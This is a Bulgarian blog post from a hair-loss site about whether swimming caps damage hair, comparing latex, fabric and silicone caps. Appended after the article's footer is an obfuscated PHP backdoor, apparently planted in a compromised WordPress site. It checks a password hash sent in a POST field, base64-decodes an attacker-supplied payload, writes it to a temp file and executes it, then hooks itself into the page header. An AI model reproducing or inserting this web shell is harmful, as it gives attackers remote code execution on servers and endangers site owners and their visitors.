Вредни ли са за косата шапките за плуване | Косопад

Вредни ли са за косата шапките за плуване

Плуването е един от най- полезните видове спорт за тялото и здравето ни. През студените месеци обаче, обикновено трябва да го практикуваме в басейна. Това означава, че задължително трябва да слагаме шапка за плуване.

shapka-za-pluvane

 Това обаче може да има негативно отражение върху косата ни, ако не внимаваме. Въпреки че е много полезна при плуване, шапката може да бъде агресивна към косата ни, ако не я изберем добре.

 Шапката за плуване оказва сериозен натиск върху косата ни, тъй като е плътно прилепнала към главата ни. Когато я сваляме, без да искаме можем да отскубнем значително количество косми. Затова, ни трябва такава шапка, която въпреки че е прилепнала плътно върху главата ни, може да се сваля без проблем. Много е важен материал, от който е изработена, за да не въздейства агресивно.

 Също така, важен фактор е и пропускливостта на шапката. На пазара има модели, които не позволяват на косата да се мокри – те имат и плюсове, и минуси. Те не оказват такъв натиск върху скалпа и позволяват на кожата да диша повече, но само ако не ги носим дълго време.

shapka-za-basein

 Други шапки са полезни за хигиената, когато плуваме. С тях кожата може повече да диша, но косата не остава суха за дълго.

 Шапките от латекс или подобни, по- непропускливи, са по- агресивни към косата. Те са много плътно прилепнали и най- много скубят косата.

 Шапките от плат или силикон не се свалят много трудно, и са добра алтернатива за хората с дълги или много обемни коси.

 Шапките обаче не са единственото агресивно нещо, когато плуваме в басейн. Водата съдържа определени вещества, които не са особено полезни за косата. Затова винаги измивайте косата си внимателно, когато излезете от басейна.

 

 

03. декември 2014 20:08:47 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}